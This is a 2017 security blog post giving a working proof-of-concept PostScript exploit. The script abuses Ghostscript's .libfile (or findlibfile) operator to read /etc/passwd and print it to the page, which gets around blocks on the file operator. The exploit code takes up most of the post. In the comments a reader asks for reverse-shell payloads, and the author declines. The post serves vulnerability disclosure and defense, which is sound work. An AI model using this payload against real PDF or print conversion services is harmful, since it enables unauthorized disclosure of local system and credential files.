Sunday, February 26, 2017

Weaponizing PostScript update

Just a short post to display a new method for reading files with PostScript. I suggest that you check out my post "Weaponizing PostScript", if the subject interests you.

There's an alternative method for reading files (thanks Tavis Ormandy!).
I've modified Tavis's code a bit and here's a PoC code for reading files with .libfile:

%!PS
/Buf 1024 string def % line buffer

/Courier             % name the desired font
8 selectfont         % choose the size in points and establish 
/LM 72 def           %Left Margin
/ypos 800 def        %current y position
/lineheight 10 def   %height of a line
/newline { 
    ypos lineheight sub
    /ypos exch def
    LM ypos moveto 
} def
LM ypos moveto 

(/etc/passwd) .libfile {
    {
        dup Buf readline
        {
            show
        }{
            showpage
            quit
        } ifelse
        % next line
        newline
    } loop
} if

You can also use the findlibfile operand in the exact same manner. Just replace ".libfile" with "findlibfile" and you should be able to read files.

The lesson of the story is, that you can't prevent Local File Disclosure by just preventing the use of file operand. The above code works with ghostscript and ps2pdf version 9.06 (latest version in Debian stable branch at the time of writing this post). 

2 comments:

  1. Hi,

    I need to get a reverse shell or local file reading. None of the payloads you mentioned in blog is not working. PS version 3010.10. Can you please help me?

    ReplyDelete
    Replies
    1. Probably not. Most PostScript engines have been secured since these issues were exploitable.

      Delete